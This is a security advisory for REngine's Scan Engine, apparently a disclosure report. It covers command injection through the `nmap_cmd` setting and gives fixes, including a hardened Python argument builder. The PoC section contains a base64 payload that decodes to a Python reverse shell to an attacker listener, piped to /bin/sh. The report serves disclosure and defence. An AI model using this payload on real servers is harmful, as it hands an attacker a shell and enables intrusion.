Summary
An authenticated user can exploit command injection through the Scan Engine configuration: the `nmap_cmd` parameter of an engine is passed to the system shell without sanitization, so replacing it with a payload and then scanning a target with that engine executes the payload on the server.
Details
Through this vulnerability an attacker with a REngine account can run arbitrary commands on the server and obtain a shell.
PoC
- Log in to REngine.
- Open Scan Engine.
- Edit any Scan Engine except the OSINT one.
- In the engine configuration, replace the `nmap_cmd` parameter with the payload below. The base64 string decodes to a Python one-liner that opens a reverse shell to the attacker's listener, and the trailing `#` comments out whatever the application appends after the injected command: `'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #'`
- Add a target and scan it with this engine; the decoded command runs on the server when the scan starts.
Impact
A reverse shell on the server was obtained; screenshots follow.
Screenshots (photo_2024-09-29 02 19 26, 02 19 38 and 02 19 44): the reverse shell session on the server.
Remediation
Input Validation: Ensure that any user-controlled input used to construct commands is strictly validated. Only allow predefined commands or allowlisted arguments to be passed; here, every token of `nmap_cmd` should be checked against a list of permitted nmap options before the scan runs. Note that `shlex.split` only tokenizes the string the way a shell would; it is a sound first step for building an argument list, but it does not by itself remove or reject anything.
```python
import shlex

user_input = "-sV -p 80,443"  # example engine setting
# Tokenize the input the way a shell would; each token still has to be
# checked against an allowlist afterwards
command = shlex.split(user_input)
```
Avoid shell=True: When using `subprocess.Popen()` or `subprocess.run()`, do not pass `shell=True` unless absolutely necessary. With it, the input is interpreted by `/bin/sh`, so `;`, `|`, `$( )` and `#` inside `nmap_cmd` become control characters. Pass an argument list instead, so each value reaches the program literally. This alone is not sufficient for nmap: options such as `--script` (runs NSE scripts) or `-oN`/`-oX` (write output files) are still dangerous as literal arguments, which is why the allowlist above is needed as well.
```python
import subprocess

# Argument list, e.g. from shlex.split plus allowlisting
command = ["nmap", "-sV", "-p", "80,443", "example.com"]
# Avoid shell=True, use direct arguments
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
```
Escape Input Properly: If a shell command string genuinely has to be built from user input, quote it with `shlex.quote` so that special characters (`&`, `;`, `|`, `#`) are passed as literal text rather than interpreted by the shell. Quoting protects the shell only; it does not stop a quoted value from being a dangerous argument to the program itself.
```python
import shlex

user_input = 'echo "x"|base64 --decode |/bin/sh #'  # example hostile value
command = shlex.quote(user_input)  # becomes a single quoted shell word
```
Use Secure Libraries: Where possible, avoid invoking shell commands through subprocess at all. Use high-level libraries or APIs that provide the functionality without executing commands. For example, when interacting with the file system, Python's `os` or `pathlib` modules offer safe file manipulation functions.
```python
import os
import subprocess

file_path = "/etc/hosts"  # example path
# Instead of running a shell command to check if a file exists:
subprocess.Popen(['test', '-e', file_path])
# Use Python's built-in functions:
if os.path.exists(file_path):
    pass  # Perform action
```
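The practices above combined into one worked example: the vulnerable shell-string pattern beside a hardened builder that tokenizes `nmap_cmd`, allowlists every option, validates the target and hands an argument list to subprocess with no shell. This is an added illustration, not REngine's own code; the allowlisted option set, the function names and the sample inputs are assumptions made for this example.

```python
import re
import shlex
import subprocess

# Added example, not the project's own code. ALLOWED_FLAGS, ALLOWED_VALUE_FLAGS
# and the function names are assumptions chosen for illustration.

# nmap options an operator may put in nmap_cmd. Anything else is rejected,
# including --script (executes NSE Lua code) and -oN/-oX/-oG (write files),
# which are dangerous even when no shell is involved.
ALLOWED_FLAGS = {"-sV", "-sS", "-sT", "-sU", "-Pn", "-n", "-O", "-T4"}

# Options that take exactly one value, with the pattern that value must match.
ALLOWED_VALUE_FLAGS = {
    "-p": re.compile(r"^[0-9,\-]{1,128}$"),       # port list such as 80,443 or 1-1024
    "--top-ports": re.compile(r"^[0-9]{1,5}$"),
    "--min-rate": re.compile(r"^[0-9]{1,6}$"),
}

# Hostname or IPv4 literal; no whitespace or shell metacharacters allowed.
TARGET_RE = re.compile(r"^[A-Za-z0-9.\-]{1,253}$")


def build_nmap_command_unsafe(nmap_cmd: str, target: str) -> str:
    """The vulnerable pattern: the config value is pasted into a shell string.
    If this string reaches os.system() or subprocess with shell=True, any
    ';', '|', '$( )' or trailing '#' inside nmap_cmd is interpreted by /bin/sh."""
    return f"nmap {nmap_cmd} {target}"


def build_nmap_argv(nmap_cmd: str, target: str) -> list:
    """Hardened pattern: tokenize, allowlist every token, and return an argv
    list for subprocess with shell=False. Raises ValueError on anything else."""
    if not TARGET_RE.match(target):
        raise ValueError(f"invalid target: {target!r}")
    # shlex.split only tokenizes (and raises ValueError on unbalanced quotes);
    # it performs no validation, which is done in the loop below.
    tokens = shlex.split(nmap_cmd)
    argv = ["nmap"]
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in ALLOWED_FLAGS:
            argv.append(tok)
            i += 1
        elif tok in ALLOWED_VALUE_FLAGS:
            if i + 1 >= len(tokens) or not ALLOWED_VALUE_FLAGS[tok].match(tokens[i + 1]):
                raise ValueError(f"bad or missing value for {tok}")
            argv.extend([tok, tokens[i + 1]])
            i += 2
        else:
            raise ValueError(f"option not allowed: {tok!r}")
    argv.append(target)
    return argv


def validate_nmap_cmd(nmap_cmd: str, target: str = "127.0.0.1") -> bool:
    """Save-time check for the Scan Engine form: True if nmap_cmd would be accepted."""
    try:
        build_nmap_argv(nmap_cmd, target)
        return True
    except ValueError:
        return False


def run_nmap(nmap_cmd: str, target: str) -> subprocess.CompletedProcess:
    """Execute without a shell; every argv element reaches nmap literally."""
    return subprocess.run(build_nmap_argv(nmap_cmd, target),
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed inputs: a benign engine setting and the shape of the report's payload.
    benign = "-sV -p 80,443"
    payload = 'echo "BASE64_REVERSE_SHELL"|base64 --decode |/bin/sh #'
    print(build_nmap_argv(benign, "example.com"))
    print(build_nmap_command_unsafe(payload, "example.com"))  # what /bin/sh would see
    print(validate_nmap_cmd(payload), validate_nmap_cmd("--script vuln"))
```

Running `validate_nmap_cmd` when the engine configuration is saved rejects the payload from the PoC at the first token (`echo`), and `run_nmap` never builds a shell string at all, so the two checks cover both the injection reported here and argument-level abuse of nmap itself.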